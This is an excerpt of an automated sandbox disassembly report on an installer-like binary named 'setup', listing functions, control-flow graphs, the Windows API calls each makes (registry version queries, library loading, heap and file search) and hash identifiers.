                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryMetricsSystem$AddressFreeLoadProc
                                                                                                                                                                              • String ID: ComCtl32.dll$LoadIconMetric
                                                                                                                                                                              • API String ID: 499052680-764666640
                                                                                                                                                                              • Opcode ID: 47d71e4d4a282453aa86fcb735ad9c035639e7b24bcbe8b1ba55f1fb29fad3d0
                                                                                                                                                                              • Instruction ID: 438acd16002b8f76743fb5b3025aeb98f5524fd342a156c57344fd51a57c872d
                                                                                                                                                                              • Opcode Fuzzy Hash: 47d71e4d4a282453aa86fcb735ad9c035639e7b24bcbe8b1ba55f1fb29fad3d0
                                                                                                                                                                              • Instruction Fuzzy Hash: 73314FB1A00259EFEB109F96DC44BAFBBF8EB48750F14422EE915E7290D7758A05CB90
                                                                                                                                                                              Function 00CD3DC0 Relevance: 7.8, APIs: 5, Instructions: 315COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 339 cd3dc0-cd3ec7 call ba8850 call d820e0 LoadStringW 344 cd3ecd-cd3ef7 call ba8300 339->344 345 cd3f80-cd3f94 339->345 355 cd3ef9-cd3f26 call ba8960 344->355 356 cd3f28 344->356 346 cd3f9e 345->346 347 cd3f96-cd3f9c 345->347 349 cd3fd5-cd3fea LoadStringW 346->349 350 cd3fa0-cd3fa9 346->350 347->349 349->345 352 cd3fec-cd4019 call ba8300 349->352 353 cd3fab-cd3fb5 call cd41c0 350->353 354 cd3fb7-cd3fcf call d820e0 350->354 371 cd401b-cd4048 call ba8960 352->371 372 cd404a 352->372 368 cd3fd2 353->368 354->368 361 cd3f2b-cd3f32 355->361 356->361 362 cd3f34-cd3f46 361->362 363 cd3f66-cd3f7a 361->363 369 cd3f5c-cd3f63 call d7fd63 362->369 370 cd3f48-cd3f56 362->370 373 cd409c-cd40a5 363->373 368->349 369->363 370->369 376 cd4108-cd4145 call d851ef 370->376 379 cd404d-cd4054 371->379 372->379 374 cd40e8-cd4107 call d7fd55 373->374 375 cd40a7-cd40b7 373->375 380 cd40c9-cd40e1 call d7fd63 375->380 381 cd40b9-cd40c7 375->381 394 cd41ae-cd41b8 call baa9b0 376->394 395 cd4147 376->395 386 cd4088-cd4098 379->386 387 cd4056-cd4068 379->387 380->374 381->376 381->380 386->373 391 cd407e-cd4085 call d7fd63 387->391 392 cd406a-cd4078 387->392 391->386 392->376 392->391 398 cd4149-cd414b 395->398 399 cd4191-cd41a2 SysAllocStringLen 395->399 401 cd414e-cd4188 CLSIDFromString SysFreeString call d7fd55 398->401 399->401 402 cd41a4-cd41a9 call baa9b0 399->402 406 cd418d-cd4190 401->406 402->394
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(?,00000000,?,00000100), ref: 00CD3EBC
                                                                                                                                                                              • LoadStringW.USER32(?,00000000,?,00000001), ref: 00CD3FDD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2948472770-0
                                                                                                                                                                              • Opcode ID: bd2f18d9c8a07e1e9cf5bacc2fce9326b12b3bc15bacfceec21a0f160745ac67
                                                                                                                                                                              • Instruction ID: eae9f35bd6ae73ad81f12af34919dd757757e26603a05abdad0df24afd518d0d
                                                                                                                                                                              • Opcode Fuzzy Hash: bd2f18d9c8a07e1e9cf5bacc2fce9326b12b3bc15bacfceec21a0f160745ac67
                                                                                                                                                                              • Instruction Fuzzy Hash: 6BC17D71D00248DFDB14DFA8C9457AEBBB5FF44304F24822AE515AB390EB746A85CB91
                                                                                                                                                                              Function 00C889F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228libraryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 444 c889f0-c88a39 GetSystemDirectoryW 445 c88b2f 444->445 446 c88a3f-c88a44 444->446 447 c88b31-c88b52 call d7fd55 445->447 446->445 448 c88a4a-c88a53 call baacf0 446->448 453 c88a59-c88a73 448->453 454 c88b53-c88d79 call baa9b0 call d7fd94 call bbf0f0 448->454 458 c88a83-c88a89 453->458 459 c88a75-c88a81 call baa2a0 453->459 463 c88a90-c88a99 458->463 467 c88aac-c88ac4 call bc2290 459->467 463->463 466 c88a9b-c88aa7 call baa830 463->466 466->467 473 c88aca-c88acf 467->473 474 c88ac6-c88ac8 467->474 476 c88ad0-c88ad9 473->476 475 c88adf-c88af9 call bc2290 call d81548 474->475 482 c88afb-c88afd 475->482 483 c88aff-c88b0a LoadLibraryExW 475->483 476->476 478 c88adb-c88add 476->478 478->475 484 c88b0c-c88b21 482->484 483->484 485 c88b2b-c88b2d 484->485 486 c88b23-c88b26 484->486 485->447 486->485
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,*.*,8007000E,80004005,00BC2B04,00000000,?,?,?,*.*,?,80070057), ref: 00BAA2C3
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,00DE0ACD,000000FF), ref: 00C88B04
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                                                                                              • String ID: UxTheme.dll
                                                                                                                                                                              • API String ID: 2586271605-352951104
                                                                                                                                                                              • Opcode ID: b20b415697e5efbb2d298634cc547f2bbd7528deb0f4ff358bede3aa43285811
                                                                                                                                                                              • Instruction ID: 068ecc62520be13866f13f6d31759f70d04cf19ebb339b4ecf7998f04be1444a
                                                                                                                                                                              • Opcode Fuzzy Hash: b20b415697e5efbb2d298634cc547f2bbd7528deb0f4ff358bede3aa43285811
                                                                                                                                                                              • Instruction Fuzzy Hash: ECA18BB0501645EFE714DF64C858BAABBF4FF04318F20825DD4299B6C1DBB6A618CB90
                                                                                                                                                                              Function 00D7F902 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 487 d7f902-d7f918 GetProcessHeap HeapAlloc 488 d7f91e-d7f924 call d7f694 487->488 489 d7f91a-d7f91d 487->489 491 d7f929-d7f937 488->491 492 d7f945 call d7f7a0 491->492 493 d7f939-d7f943 491->493 496 d7f94a-d7f950 492->496 493->496 497 d7f963-d7f966 496->497 498 d7f952-d7f961 GetProcessHeap HeapFree 496->498 498->489
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000008,?,00BB83B7,?,?,00BB8164,?), ref: 00D7F907
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F90E
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00BB8164,?), ref: 00D7F954
                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F95B
                                                                                                                                                                                • Part of subcall function 00D7F7A0: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D7F94A,00000000,?,?,00BB8164,?), ref: 00D7F7C4
                                                                                                                                                                                • Part of subcall function 00D7F7A0: HeapAlloc.KERNEL32(00000000,?,?,00BB8164,?), ref: 00D7F7CB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Alloc$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1864747095-0
                                                                                                                                                                              • Opcode ID: 897d0ac2c856a797f245f67d49a8f242f6696a1aac9e3c17896dab620501ca26
                                                                                                                                                                              • Instruction ID: ec1f047d5307fd1959d4803d8691d85bfe35efb4cf7cf0f91ee0d09bad410693
                                                                                                                                                                              • Opcode Fuzzy Hash: 897d0ac2c856a797f245f67d49a8f242f6696a1aac9e3c17896dab620501ca26
                                                                                                                                                                              • Instruction Fuzzy Hash: 27F09072644711ABC7342BB9BC08A5F2A559B94761725C138F649E6254EF20C8418B70
                                                                                                                                                                              Function 00CCBDA0 Relevance: 4.6, APIs: 3, Instructions: 93fileCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 500 ccbda0-ccbdda 501 ccbddc-ccbddf 500->501 502 ccbde4-ccbde7 500->502 503 ccbeb5-ccbed0 call d7fd55 501->503 504 ccbded-ccbdef 502->504 505 ccbeb0 502->505 507 ccbdf5-ccbdf9 504->507 508 ccbed1-ccbedb call baa9b0 504->508 505->503 510 ccbe0b-ccbe0e 507->510 511 ccbdfb-ccbdfe 507->511 510->508 515 ccbe14-ccbe19 510->515 511->508 513 ccbe04-ccbe09 511->513 513->510 516 ccbe1f-ccbe5f call d820e0 FindFirstFileW 513->516 515->505 515->516 519 ccbe7e-ccbe84 GetLastError 516->519 520 ccbe61-ccbe7c 516->520 521 ccbe86-ccbe99 519->521 520->521 522 ccbeac-ccbeae 521->522 523 ccbe9b-ccbea2 FindClose 521->523 522->503 523->522
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00CCBE3D
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00CCBE9C
                                                                                                                                                                                • Part of subcall function 00BAA9B0: RtlAllocateHeap.NTDLL(?,00000000,?,02141699,00000000,00DA7E40,000000FF,?,?,00E9717C,?,00D11D86,8000000B,02141699), ref: 00BAA9FA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1673784098-0
                                                                                                                                                                              • Opcode ID: e888db47204757e1351086c9d6c357f338322ca12b290d3c39e26c628a109490
                                                                                                                                                                              • Instruction ID: a359c89d7996af6efb4b947e0db3cb33d77a4cbf6bc37bbb9d87559549225b98
                                                                                                                                                                              • Opcode Fuzzy Hash: e888db47204757e1351086c9d6c357f338322ca12b290d3c39e26c628a109490
                                                                                                                                                                              • Instruction Fuzzy Hash: D931D571904218DFDB24DF95C84AFAAB7F4FB44B10F20829EEA29A3380D7715E44CB91
                                                                                                                                                                              Function 00BDC5D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __set_se_translator.LIBVCRUNTIME ref: 00BDC5E8
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00CCAD60), ref: 00BDC5FE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2480343447-0
                                                                                                                                                                              • Opcode ID: 8f26c1f0903634806eb335d5940fb21c3b7e72729d12c5e710f72fd2de98cd0b
                                                                                                                                                                              • Instruction ID: 283aad4e7cc383e9db4eea8833621fb82efec56d26391f73d5cf79b9b78173cc
                                                                                                                                                                              • Opcode Fuzzy Hash: 8f26c1f0903634806eb335d5940fb21c3b7e72729d12c5e710f72fd2de98cd0b
                                                                                                                                                                              • Instruction Fuzzy Hash: 93E086769042446EC621A761EC0DF4B7FA4EBDB714F088469F10473252D7749849D772
                                                                                                                                                                              Function 00D16E40 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00CD0DC0: __Init_thread_footer.LIBCMT ref: 00CD0EA0
                                                                                                                                                                              • CoCreateInstance.COMBASE(00E170E8,00000000,00000001,00E34C18,00000010), ref: 00D16EBE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInit_thread_footerInstance
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3436645735-0
                                                                                                                                                                              • Opcode ID: 9ba1a07129082a08d723e8c8d5b061c94c209166b1aa83fa7a19f5216529106b
                                                                                                                                                                              • Instruction ID: bcbb026f6b8d35b4c4bfdb7c8249a4a225e579749561f4caa3da14cdddf0d2c4
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ba1a07129082a08d723e8c8d5b061c94c209166b1aa83fa7a19f5216529106b
                                                                                                                                                                              • Instruction Fuzzy Hash: D511C0B1644304EFD720CF59D804B8ABBF8EB05B20F10465EF825AB7C0C7B6A508CBA0
                                                                                                                                                                              Function 00CD1470 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 220registryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 0 cd1470-cd14e8 RegOpenKeyExW 2 cd14ee-cd151f RegQueryValueExW 0->2 3 cd1752-cd176b 0->3 6 cd156f-cd159a RegQueryValueExW 2->6 7 cd1521-cd1533 call cd6ec0 2->7 4 cd176d-cd1774 RegCloseKey 3->4 5 cd177e-cd1799 call d7fd55 3->5 4->5 6->3 10 cd15a0-cd15b1 6->10 16 cd1535-cd1542 7->16 17 cd1544-cd155b call cd6ec0 7->17 11 cd15bd-cd15bf 10->11 12 cd15b3-cd15bb 10->12 11->3 15 cd15c5-cd15cc 11->15 12->11 12->12 18 cd15d0-cd15de call cd6ec0 15->18 19 cd156a 16->19 24 cd155d 17->24 25 cd1562-cd1568 17->25 26 cd15e9-cd15f7 call cd6ec0 18->26 27 cd15e0-cd15e4 18->27 19->6 24->25 25->19 32 cd15f9-cd15fd 26->32 33 cd1602-cd1610 call cd6ec0 26->33 28 cd1724 27->28 31 cd172b-cd1738 28->31 34 cd174a-cd174c 31->34 35 cd173a 31->35 32->28 39 cd161b-cd1629 call cd6ec0 33->39 40 cd1612-cd1616 33->40 34->3 34->18 37 cd1740-cd1748 35->37 37->34 37->37 43 cd162b-cd162f 39->43 44 cd1634-cd1642 call cd6ec0 39->44 40->28 43->28 47 cd164d-cd165b call cd6ec0 44->47 48 cd1644-cd1648 44->48 51 cd165d-cd1661 47->51 52 cd1666-cd1674 call cd6ec0 47->52 48->28 51->28 55 cd167f-cd168d call cd6ec0 52->55 56 cd1676-cd167a 52->56 59 cd168f-cd1694 55->59 60 cd1699-cd16a7 call cd6ec0 55->60 56->28 61 cd1721 59->61 64 cd16a9-cd16ae 60->64 65 cd16b0-cd16be call cd6ec0 60->65 61->28 64->61 68 cd16c7-cd16d5 call cd6ec0 65->68 69 cd16c0-cd16c5 65->69 72 cd16de-cd16ec call cd6ec0 68->72 73 cd16d7-cd16dc 68->73 69->61 76 cd16ee-cd16f3 72->76 77 cd16f5-cd1703 call cd6ec0 72->77 73->61 76->61 80 cd170c-cd171a call cd6ec0 77->80 81 cd1705-cd170a 77->81 80->31 84 cd171c 80->84 81->61 84->61
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 00CD14E0
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 00CD151B
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 00CD1596
                                                                                                                                                                              • RegCloseKey.KERNEL32(00000000), ref: 00CD176E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                                              • String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                                                                                                                                                              • API String ID: 1586453840-3149529848
                                                                                                                                                                              • Opcode ID: f1f07109241e09d18b66d44d3d590559c54328799d4c1db03cac5af555db179a
                                                                                                                                                                              • Instruction ID: 7ca58ea169e09e871f0192fe11255ace1b7727abbf5ed2509e743566d20c8e79
                                                                                                                                                                              • Opcode Fuzzy Hash: f1f07109241e09d18b66d44d3d590559c54328799d4c1db03cac5af555db179a
                                                                                                                                                                              • Instruction Fuzzy Hash: EF71A478700318AADB209B31ED417AA73B5EB85744F19507BEF16A7791EB34CE4A8780
                                                                                                                                                                              Function 00CD10E0 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 224registrylibraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 85 cd10e0-cd1156 RegOpenKeyExW 87 cd115c-cd11bd RegQueryValueExW * 2 85->87 88 cd141b-cd1434 85->88 89 cd11bf-cd11f1 RegQueryValueExW 87->89 90 cd121b-cd125c RegQueryValueExW 87->90 91 cd1447-cd1460 call d7fd55 88->91 92 cd1436-cd143d RegCloseKey 88->92 89->90 93 cd11f3-cd11fb 89->93 94 cd125e-cd1286 call cd6e20 90->94 95 cd1288 90->95 92->91 93->93 97 cd11fd-cd1200 93->97 99 cd128e-cd1296 94->99 95->99 97->90 101 cd1202-cd1215 97->101 103 cd1298-cd12a6 99->103 104 cd12ab-cd12d6 RegQueryValueExW 99->104 101->90 103->104 105 cd12fd-cd1328 RegQueryValueExW 104->105 106 cd12d8-cd12f8 call cd6e20 104->106 107 cd137f-cd1392 105->107 108 cd132a-cd1339 105->108 106->105 112 cd13db-cd13e3 107->112 113 cd1394-cd13a8 call d80260 107->113 110 cd133b-cd1344 108->110 111 cd1355-cd1363 108->111 115 cd1346-cd1353 110->115 116 cd136f-cd137a 111->116 117 cd1365-cd136d 111->117 119 cd140f 112->119 120 cd13e5-cd1401 GetCurrentProcess 112->120 113->112 125 cd13aa-cd13d8 GetModuleHandleW GetProcAddress call d80216 113->125 115->111 115->115 116->107 117->116 117->117 121 cd1411-cd1416 call cd1470 119->121 120->119 126 cd1403-cd140d 120->126 121->88 125->112 126->121
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 00CD114E
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 00CD1195
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 00CD11B4
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 00CD11E3
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 00CD1258
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 00CD12D2
                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 00CD1324
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CD13B8
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CD13BF
                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00CD13D3
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00CD13F6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CD1437
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmpDownload File
